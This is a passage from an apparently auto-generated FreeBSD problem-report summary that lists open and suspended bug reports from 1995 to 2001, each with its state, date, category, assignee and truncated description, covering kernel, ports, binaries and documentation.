4.3-RELEASE does not recognize Gi o [2001/05/04] bin/27088 syslogd(8) doesn't create log files if th a [2001/05/05] ports/27102 ports lzo-1.07 port broken o [2001/05/06] bin/27153 session settings in pam.conf are ignored o [2001/05/06] bin/27154 login(1) accesses pam_getenvlist() *after o [2001/05/07] i386/27197 4.3-STABLE make buildworld fails at perl o [2001/05/08] ports/27202 ports mail/pine sucks rocks when saving over NF o [2001/05/08] ports/27203 ports mail/cclient sucks rocks when saving over o [2001/05/08] ports/27204 ports rplayd complains about pcm mixer device o o [2001/05/09] bin/27230 nectar Users after NIS lines in /etc/passwd o [2001/05/09] kern/27237 Watchdog Timeouts under EXCESSIVE load o [2001/05/09] bin/27240 df does not support -l option o [2001/05/09] kern/27242 SIGHUP propagation failure to processes o o [2001/05/10] i386/27247 Panic on install - "page fault syncing di f [2001/05/10] kern/27253 des linprocfs does not implement the loadavg o [2001/05/10] kern/27262 process won't be terminated after CPUTIME o [2001/05/12] ports/27285 archie SKIP doesn't work on 4.x o [2001/05/12] kern/27287 poll(2) returns 0 when POLLIN-ing ordinar o [2001/05/13] misc/27303 Error during Commit: Unable to make devic o [2001/05/15] ports/27331 andreas GhostScript6 needs pdf_sec.ps which canno f [2001/05/15] kern/27350 des /compat/linux/proc/meminfo has size overf o [2001/05/15] ports/27358 ports Naming scheme for JDK ports (java) o [2001/05/16] kern/27383 iedowse Client NFS mount hangs with multihomed se o [2001/05/16] misc/27384 SCSI Hardrive bios of COMPAQ Proliant is o [2001/05/16] kern/27395 Problems with Qlogic 2200 FC card. The sy o [2001/05/16] misc/27400 4.3 install hangs because it is looking f o [2001/05/16] ports/27402 tegge Static linking problems with time functin o [2001/05/17] i386/27404 FreeBSD-4.3 crashes in VMware o [2001/05/17] ports/27419 jhb E-FancyLauncer clones itself over and ove o [2001/05/19] bin/27457 yppush fails when updating two or more sl o [2001/05/19] kern/27460 Bad entries for EPSON 1240U scanner o [2001/05/20] kern/27474 Interactive use of user PPP and ipfilter o [2001/05/21] misc/27498 grog vinum crashed after 'vinum dumpconfig' o [2001/05/21] kern/27504 bp Probelms with mfs in 4.3 Stable o [2001/05/21] misc/27510 Alcatel Speed Touch ASDL Modem - USB o [2001/05/21] kern/27522 des linprocfs:/proc/stat does not handle SMP o [2001/05/22] kern/27543 des /proc/cpuinfo does not handle SMP hosts o [2001/05/23] bin/27593 sos-bugs burncd msinfo returns wrong info at more s [2001/05/23] kern/27601 infinite loop at end (?) of ifnet list .. o [2001/05/23] docs/27605 doc Cross-document references () o [2001/05/24] ports/27617 lioux clockspeed port needs leapsecs.dat o [2001/05/24] bin/27630 mktime failure. o [2001/05/25] ports/27632 reg SNNSv4.2 port has known and fixable bug o [2001/05/25] bin/27636 dwmalone inetd's internal "auth" service exploits o [2001/05/25] ports/27645 portmgr PKG_IGNORE_DEPENDS for X does not work o [2001/05/26] kern/27661 >1000 ipfw rules and heavy traffic crash a [2001/05/26] kern/27674 sos IDE Interrupts disabled on resume o [2001/05/27] kern/27694 cg Panic in csa(4) o [2001/05/28] ports/27705 ports The p5-Tcl port is broken due to wrong in f [2001/05/28] i386/27711 panic: ffs_write: type: 0xc39b2fc9 9 (0,5 o [2001/05/28] ports/27713 ports ports: /usr/ports/japanese/linux_locale: o [2001/05/29] i386/27729 the ls120 device "afd" does not show up u o [2001/05/29] ports/27739 ports Broken Port: textproc/pspell-ispell -- co o [2001/05/29] kern/27759 linux sysinfo system call is needed for m o [2001/05/30] ports/27769 ports New port: p5-XML-LibXSLT - Interface to G o [2001/05/30] kern/27782 darrenr ipf packet munging bug using "to" option o [2001/06/01] misc/27810 rpc.statd can loop o [2001/06/01] kern/27812 sos Some weird ATA[PI] problem ? o [2001/06/01] kern/27826 [PATCH] correct minor bugs in an(4) ifcon o [2001/06/03] ports/27855 ade Update port: x11/gdm o [2001/06/03] ports/27859 will kdenetwork2 make fails o [2001/06/03] ports/27865 ports mod_python port is broken o [2001/06/04] docs/27870 mail-list subscribtion method change. o [2001/06/04] ports/27875 ports invoked on boot, SIGHUP is delivered and 1035 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1995/01/11] i386/105 Distributed libm (msun) has non-standard s [1995/09/26] kern/742 syslog errors accessing Mac hard disks [p o [1995/10/03] kern/765 asmodai umount -f can`t umount a NFS filesystem i s [1995/11/20] kern/831 one minor complaint about the kernel visu a [1995/11/30] bin/854 swapinfo shows incorrect information for a [1996/01/30] bin/981 fenner clnt_broadcast() is not aware of aliases s [1996/03/20] bin/1093 route's diagnostic is weird a [1996/07/07] bin/1375 eivind Extraneous warning from mv(1) [PATCH] s [1996/09/08] bin/1589 msmith [PATCH] ftp fails to flush output o [1996/09/14] gnu/1611 phk groff should use "system-wide" papersize s [1996/10/13] misc/1791 tegge syslimits.h does not allow overriding def o [1996/10/20] bin/1849 obrien gdb sets library breakpoints on the wrong s [1996/11/04] gnu/1961 [PATCH] uucp logging files are in /var/sp s [1996/11/22] bin/2090 clients may bind to FreeBSD ypserv refusi s [1996/12/02] bin/2137 tegge vm statistics are bad s [1996/12/14] bin/2216 obrien [PATCH] Ada specs not being compiled into a [1996/12/21] bin/2265 guido su(1) does not call skeyaccess() o [1996/12/24] kern/2273 dufault support for POSIX.4 / POSIX.1a RT-schedul s [1996/12/27] kern/2298 Support for DSR/DCD swapping on serial po a [1996/12/27] misc/2302 brandon new crypt() including SHS and an extendab o [1997/01/10] bin/2442 davidn setusershell()/endusershell() missing o [1997/01/28] bin/2603 dufault Added POSIX.4/POSIX.1b constants in unist o [1997/02/02] gnu/2637 tar dumped core with -g option. a [1997/02/02] bin/2641 wpaul login_access.c doesn't work with NIS by d o [1997/02/15] misc/2745 fenner PR querry web form doesn't sort correctly o [1997/03/03] kern/2865 peter NFS client hangs on umount, ls, df when N o [1997/03/10] bin/2934 cracauer sh(1) has problems with $ENV s [1997/03/10] bin/2938 hoek Add -b, -l, and -f options to du(1) o [1997/03/31] gnu/3157 obrien Patches to gas and gdb to support MMX ext o [1997/04/07] bin/3221 rpc.rusersd : can't communicate with SunO o [1997/04/07] misc/3225 [PATCH] uucpd.c should normalize host nam o [1997/04/09] bin/3242 incorrect prototype for initgroups o [1997/04/14] bin/3284 [PATCH] symorder(1): -t option doesn´t wo o [1997/04/29] bin/3416 ibcs emulation problems a [1997/05/08] gnu/3552 asmodai the -L option of tar does not work proper o [1997/05/16] bin/3608 Telnet in linemode will break apart long o [1997/06/02] bin/3762 dufault Bogus return values from rtprio(1) o [1997/06/09] bin/3826 KerberosIV sometimes hangs rcp o [1997/06/10] bin/3837 dufault new feature for rtprio o [1997/06/15] kern/3879 peter Can't export mounted ext2fs via NFS o [1997/06/19] misc/3912 ctags(1) cannot trace some macro correctl o [1997/06/24] kern/3944 paul if_le doesnt receive ether multicast pack o [1997/06/25] kern/3948 jlemon nonworking t/tcp server side o [1997/06/27] kern/3968 Hardware probes die on Peak SBCs. o [1997/07/07] kern/4051 pppd connect 'chat ...' broken o [1997/07/18] bin/4116 davidn Kerberized login as .root fails to s [1997/07/24] bin/4157 [PATCH] netstat atalk output should print o [1997/07/26] bin/4172 des suggest reconnection option added to fetc s [1997/07/28] kern/4184 [PATCH] minor nits in sys/netatalk s [1997/07/31] bin/4204 [PATCH] ac printed wrong report about tty o [1997/08/07] kern/4243 file locking doesn't work for pipe o [1997/08/08] misc/4249 wpaul ypchsh doesn't care about changing a user o [1997/08/12] misc/4285 SDL RISCom/N2 (ISA) o [1997/08/13] kern/4297 dufault SIGEV_NONE and SIGEV_SIGNAL go in signal. o [1997/08/13] i386/4300 msmith The initial timeout on open("/dev/lpt0".. o [1997/08/14] ports/4304 portmgr Recommendation re. Ports Collection o [1997/08/29] kern/4413 No way to unmount a floppy that goes bad o [1997/08/29] bin/4419 sheldonh man can display the same man page twice o [1997/08/29] bin/4420 roberto find -exedir doesn't chdir for first entr o [1997/09/03] bin/4459 bde No prototype for moncontrol(3) and monsta o [1997/09/13] kern/4528 processes hang if the mount_portal proces f [1997/09/16] misc/4556 will make can't build executable from single F o [1997/09/21] kern/4597 Patch to pass NPX status word in signal c o [1997/09/25] bin/4629 calendar doesn't print all dates sometime o [1997/09/28] misc/4646 Can't fixit with an NFS-mounted CD. o [1997/10/05] bin/4696 ping hangs on certain unresolvable hosts o [1997/10/15] gnu/4771 diff to correct misleading total bytes in o [1997/10/22] bin/4828 ypxfr makes false assumption about RPC ca o [1997/10/24] kern/4845 Boot complains about disk slices in FAT p o [1997/11/08] bin/4975 quotaon while server very busy causes loc o [1997/11/11] kern/5009 ibcs2 emulation o [1997/11/13] bin/5031 gad lpr does not remove original file if -s i o [1997/11/14] kern/5048 dillon Calling shutdown(fd,1) multiple times wil o [1997/11/20] kern/5108 dillon pmap_release panics with 'freeing held pa o [1997/11/20] kern/5110 dillon kernel crash & core in pmap_testbit durin s [1997/11/28] bin/5173 [PATCH] restore ought to deal with root s s [1997/11/30] i386/5182 bde [PATCH] A patch support high speed serial s [1997/12/11] kern/5275 dillon [PATCH] Added volume (barcode) support to s [1997/12/14] bin/5296 slattach fails creating pidfile with ioct o [1997/12/22] kern/5362 peter mount incorrectly reports / as an NFS exp s [1998/01/03] bin/5419 [PATCH] timed rejects valid networks with s [1998/01/08] bin/5444 [PATCH] ypserv uses wrong dns lookup orde o [1998/01/11] bin/5483 Login(1) clears utmp entry s [1998/01/20] misc/5531 [SUBMISSION] new library function abs2rel s [1998/01/20] kern/5532 [PATCH] Dropped packet counts are inaccur o [1998/01/24] i386/5559 imp PC-Card joystick ports were not supported o [1998/01/26] kern/5577 bde Unnecessary disk I/O and noatime ffs fixe a [1998/01/28] bin/5591 Trouble with LD_PRELOAD environment varia o [1998/01/31] bin/5609 gad lpd cannot send long files to HP's JetDir o [1998/02/06] kern/5672 dillon Crash from scsi aborted command 'Overlapp o [1998/02/09] kern/5689 phk sysctl vm.vmmeter - bogus and unsupported o [1998/02/10] bin/5712 /bin/chio code cleaup and option added o [1998/02/14] bin/5745 [PATCH] Add /usr/local/share/mk to defaul o [1998/02/17] kern/5768 Shutdown aborts syncing, when sync isn't o [1998/02/18] i386/5784 ibcs2 emulation not handling ioctl(..FION o [1998/02/26] kern/5863 Kernel support for sorted SHUTDOWN & SHUT o [1998/03/02] bin/5901 new version of `fmt' o [1998/03/03] bin/5912 kinit exits if no user name specified o [1998/03/06] kern/5931 dma errors in syslog with GUS-max a [1998/03/06] i386/5932 perfmon kernel code should check for non- o [1998/03/11] gnu/5982 no error exit code from tar on child fail o [1998/03/13] bin/6000 kadmin ank uses bad default expiration of o [1998/03/15] bin/6015 indent(1) breaks source with backslash ne f [1998/03/28] bin/6161 assar 2.2.6 kerberos servers are awfully visibl o [1998/03/31] bin/6183 quota hangups o [1998/03/31] kern/6184 No error if resulting file pos in lseek i o [1998/04/03] bin/6202 No way to detect removable media. o [1998/04/06] bin/6234 ypserv -d is broken o [1998/04/14] kern/6296 IP_HDRINCL sockets force header fields to s [1998/04/15] bin/6314 [PATCH] /usr/sbin/ac modification o [1998/04/16] kern/6318 pppd does not update wtmp on hangup o [1998/04/16] misc/6320 Sometimes nohup isn't good enough. o [1998/04/17] bin/6332 bde /usr/include/time.h doesn't compile with o [1998/04/17] gnu/6338 Gnu tar not working properly with the -G o [1998/04/18] conf/6346 Kernel version strings need to relate to a [1998/04/27] kern/6432 IFF_NOARP does not affect ethernet interf s [1998/05/05] bin/6521 nbm [MAYBE PATCH] "rmdir -p x/y/z/" fails o [1998/05/07] kern/6544 luigi Only get one channel through sound card o [1998/05/11] i386/6595 Old IP address persistent after change o [1998/05/12] misc/6612 will bsd.man.mk can't handle man pages with ": o [1998/05/13] kern/6623 non-root user can crash system if disconn o [1998/05/13] conf/6624 davidn One class with nologin=/etc/nologin: reje o [1998/05/15] kern/6651 peter Possible NFS deadlock clue s [1998/05/17] kern/6668 babkin [PATCH] new driver: Virtual Ethernet driv a [1998/05/26] misc/6759 phk buggy code in libdisk.a's disk.c s [1998/05/29] bin/6785 place for all the default dump flags s [1998/06/01] kern/6820 jesper cd9660_mount NULL pointer deref for no CD o [1998/06/06] kern/6874 accounting prevents transition to multi u o [1998/06/13] misc/6936 phk sysinstall: install from MS-DOS MO divece o [1998/06/22] bin/7023 portmgr bsd.port.(%|subdir.).mk patches for size s [1998/06/24] kern/7044 [PATCH] WaveLAN (2.4G, ISA, full-length b o [1998/06/25] docs/7065 wosch FreeBSD webpages -> applications, port br s [1998/06/28] i386/7100 integrate pcvt configuration into the /et s [1998/07/01] bin/7136 kerberized telnetd doesn't use gettytab % s [1998/07/08] kern/7210 [PATCH] od(4) bug fixes and enhancements, s [1998/07/10] misc/7232 murray Suggestion for FreeBSD installation dialo o [1998/07/10] kern/7234 yokota keyboard problems during login immediatel o [1998/07/12] bin/7265 A warning flag is added to ln(1). o [1998/07/13] ports/7268 portmgr MASTER_SITE_OVERRIDE works more better o [1998/07/14] kern/7282 some old and rarely used drivers have app o [1998/07/15] bin/7287 Incorrect domain name for MAP_UPDATE in m o [1998/07/16] bin/7298 Improvements to ln(1). a [1998/07/19] bin/7324 wosch Suggestions for minor modifications to ad a [1998/07/31] docs/7456 doc dialog(3) man page outdated s [1998/08/13] conf/7606 [PATCH] NIS Makefile.dist: NOPUSH replace s [1998/08/18] bin/7669 libalias does not IRC DCC packets under c o [1998/08/19] gnu/7687 description of default baud rate for cu c s [1998/08/22] kern/7722 Changes to acct format o [1998/08/28] misc/7771 Debugging putenv/getenv o [1998/09/03] bin/7828 Add a command line option to cp to make i o [1998/09/05] kern/7837 patches to add a p_auth extension pointer o [1998/09/08] bin/7860 gad Extra option to pr(1). s [1998/09/08] bin/7868 [almost patch]Morse Code Fixups o [1998/09/16] misc/7946 asami ccdconfig gives confusing error when give o [1998/09/17] bin/7962 /usr/bin/ee prompts "save changes" when f o [1998/09/18] bin/7973 gad lpd: Bad control file owner in case of re o [1998/09/19] kern/7990 patch - teach kernel about RB_POWEROFF fl o [1998/09/20] bin/7998 jkh pkg_add seems to have unneeded umask s [1998/09/21] kern/8015 nbm [patch] Some sysctl descriptions for the o [1998/09/24] ports/8042 torstenb If pidentd dies, you must kill all telnet o [1998/09/26] bin/8060 install ignores the +X mode flag o [1998/09/27] conf/8061 profiling utilities seperate from profili o [1998/09/27] ports/8063 portmgr [PATCH] Add multiple CDROM support to bsd o [1998/10/03] misc/8133 markm [patch] bug in telnetd (Kerberos IV) o [1998/10/12] bin/8295 order of options in printcap causes some f [1998/10/13] conf/8303 3.0-981009-BETA can't make swap device on o [1998/10/13] kern/8311 kernel panic on de0 o [1998/10/16] misc/8346 Strftime can't generate ISO-8601 timezone o [1998/10/16] kern/8349 [PATCH] Changer definition for SureStore o [1998/10/19] kern/8376 CLOCK_VIRTUAL not implemented o [1998/10/24] misc/8434 boot.flp /bin/init crashes during probe w o [1998/10/24] i386/8436 boot.flp sysinstall crashes when probing o [1998/10/24] bin/8438 ex/vi: Error: tcsetattr: Interrupted syst o [1998/10/27] i386/8474 repquota does not pick up NIS information o [1998/10/28] bin/8479 Final \'s in /etc/exports did not work in o [1998/10/30] kern/8498 Race condition between unp_gc() and accep o [1998/11/03] bin/8553 /usr/libexec/mail.local doesn't handle "> o [1998/11/07] kern/8589 incorrect spelling for "dependency" and " o [1998/11/08] kern/8604 ps u gets confused about process start ti o [1998/11/09] bin/8631 pci interrupts are shown on EISA only mac o [1998/11/09] kern/8633 TCP packet via SLIP/CSLIP containing this o [1998/11/12] bin/8666 X blocks serial port with getty process o o [1998/11/19] misc/8764 pwd_mkdb is slow on many users o [1998/11/19] docs/8765 dwhite some suggested text for describing passwo o [1998/11/27] i386/8867 murray /stand/sysinstall core dumps (signal 11) o [1998/11/30] bin/8913 negative time values for csh 'time' built o [1998/12/01] kern/8925 options kern file needs AWE_DEFAULT_MEM_S o [1998/12/08] bin/9012 route add -host hostIP -interface localIP o [1998/12/16] ports/9107 portmgr Addition to bsd.port.mk for searching mul a [1998/12/18] bin/9123 kris pax can't read tar archives that contain o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() f [1998/12/28] misc/9220 ache nvi: catalog: mistake in Russian error me o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 mikeh new option to prevent mail from sending m o [1999/01/19] kern/9570 dfr ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/22] kern/9619 Restarting mountd kills existing mounts o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/28] kern/9748 error in queue handling of at_shutdown() a [1999/01/28] bin/9770 kris An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/31] ports/9840 portmgr patch allows ports to fetch their sources o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10160 kldload of umap module panics the system f [1999/02/21] ports/10178 ports USE_SOCKS=YES option broken for security/ o [1999/02/25] docs/10240 wosch We need a script which check if our web m f [1999/02/26] bin/10274 will make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/03/01] docs/10349 phantom For long .Dt fields, rendering is broken- o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames f [1999/03/05] ports/10396 asami SPIN is in the wrong category o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i f [1999/03/07] i386/10465 mdodd Must disable ex0 to install. o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/14] conf/10582 marcel Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/17] kern/10641 groudier Default sync rate in ncr SCSI driver is s o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] misc/10667 murray Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682 portmgr List mirror sites in MASTER_SITE_BACKUP - o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 joe whois(1) client enchancements a [1999/03/26] misc/10804 joe whois(1) enhancement o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/05] ports/10965 obrien lcc-3.6 unable to compile anything o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048 ports variable not initialized in fwtk-lib lead o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 will make(1) does not work as documented with o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 a [1999/04/16] bin/11168 davidn pw(8) usermod does not recognize -w flag o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] bin/11248 Shuffle o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi s [1999/05/09] ports/11611 billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] bin/11746 mikeh Add support for Solaris mailboxes o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/28] bin/11914 wosch makewhatis during installworld uses /usr/ o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/02] conf/11989 pppd(8) output misplaced o [1999/06/03] kern/12014 alfred Fix SysV Semaphore handling o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/13] ports/12188 trevor new port: misc/pbs - a batch scheduler o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12263 hoek "more" problems with long filenames o [1999/06/18] bin/12280 LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 portmgr Adds refetch functionallity to bsd.port.m o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only s [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/06] kern/12543 dg [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/08] ports/12566 billf a guide to pyrotechnics o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr f [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] kern/12723 imp Unnecessary use of magic numbers in F_[SG o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/28] kern/12855 mckusick panic:softdep_flushfiles:looping, caused o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c f [1999/08/03] bin/12942 gshapiro m4: len(`') returns `' o [1999/08/04] ports/12952 portmgr make _PORT_USE touch cookies by variable, o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp f [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 will make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] docs/13079 dwhite new man page describing timeradd() family o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/21] bin/13309 Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for m_pkthdr.l o [1999/11/30] bin/15182 "* Wed-1 event" in calendar produces "31 o [1999/12/01] misc/15205 billf Addition to /usr/games/random o [1999/12/02] i386/15218 kernel says: raw partition size != slice o [1999/12/02] bin/15229 joe mtree - different from mtree in NetBSD 1. o [1999/12/06] bin/15301 Bug in /usr/sbin/syslogd: strips 8th bits a [1999/12/09] ports/15387 billf ethereal's packet-smb.c calls str*() func o [1999/12/10] bin/15410 edquota -p copies current usage as well a o [1999/12/11] bin/15416 addr2line is unable to find line numbers o [1999/12/11] bin/15418 tput(1) doesn't work with new libncurses. o [1999/12/11] misc/15421 initgroups(3) spits out messages to stder o [1999/12/12] kern/15435 Attempts to execute programs from a noexe o [1999/12/12] kern/15436 syscons extension: "propellers" o [1999/12/13] bin/15456 Usage of ktrace(1) is invalid a [1999/12/13] bin/15458 sort(1) doesn't sort correctly in some ca o [1999/12/13] bin/15470 Proposed change to comments in /etc/named o [1999/12/14] ports/15477 demon wwwstat-2.01 port is not Y2K compliant: 1 o [1999/12/14] misc/15480 Change-request for /usr/src/usr.sbin/cdco o [1999/12/14] kern/15489 running fstat causes a bus error o [1999/12/15] kern/15492 Patch to fixup bridging support for 2.2-S o [1999/12/15] kern/15493 Patch to enable bridging support for if_c o [1999/12/15] ports/15495 portmgr Add "addsum" target to bsd.port.mk o [1999/12/15] bin/15496 killall(1) limited to 16 character proces o [1999/12/15] bin/15497 NIS does not deal well with comments o [1999/12/15] bin/15510 df(1) does not lineup with large filesyst o [1999/12/20] bin/15593 [SECURITY] ustrcpy() buffer overflow in d o [1999/12/21] kern/15608 acd0 / cd0 give inconsistent errors on em o [1999/12/21] conf/15612 jkh Re-Scan devices in 3.4-Release options me o [1999/12/21] i386/15619 standard pppd doesn't authenticate users o [1999/12/22] kern/15636 dillon reminder to self for MAP_ VM defines o [1999/12/23] misc/15658 edquota misinterprets usernames as uid ra o [1999/12/24] bin/15663 yokota none o [1999/12/28] bin/15739 repquota report format fix for better par o [1999/12/28] conf/15748 jkh sysinstall - upgrade o [2000/01/01] kern/15827 Power-Off causes Trap 9 in kernel o [2000/01/01] bin/15830 imp PATCH: rdump over ssh o [2000/01/02] kern/15838 Conversion tables in msdosfs_conv.c are b s [2000/01/02] bin/15852 asmodai predefined \*(DT string has Y2K bug o [2000/01/02] bin/15853 tar --newer-mtime flag has Y2K bug o [2000/01/03] kern/15860 patch to make default kern.maxfilesperpro o [2000/01/03] misc/15871 small CVS directories copied to PicoBSD filesys o [2000/01/03] misc/15874 small PicoBSD can only update files from within o [2000/01/03] misc/15876 small PicoBSD message of the day problems o [2000/01/08] kern/15983 n_hibma C++ keywords in kernel header files o [2000/01/08] ports/15992 joe [PATCH] Add a default for $SUP in the /us o [2000/01/08] ports/15993 portmgr [PATCH]No line-feed in warnings from ``ma o [2000/01/09] misc/16003 sysinstall crashes if it gets more than o o [2000/01/10] kern/16021 To support SMP on NEC PC98, call mp_probe o [2000/01/10] kern/16023 Add an idletime counter for sppp, just li o [2000/01/10] kern/16049 Connor Drive fails cache sync o [2000/01/11] conf/16076 markm [PATCH] pam_ssh examples for /etc/pam.con o [2000/01/14] bin/16119 ctm_rmail does not honor umask o [2000/01/15] ports/16139 billf Ntop port fails to find lsof o [2000/01/18] kern/16169 The U.S. Robotics 56K Voice Int modem is o [2000/01/18] misc/16189 Advansys ASB-3940U2W SCSI Card does not w o [2000/01/18] kern/16195 rwatson 16-bit uid/gid struct in sys/ipc.h o [2000/01/19] bin/16206 PATCH: 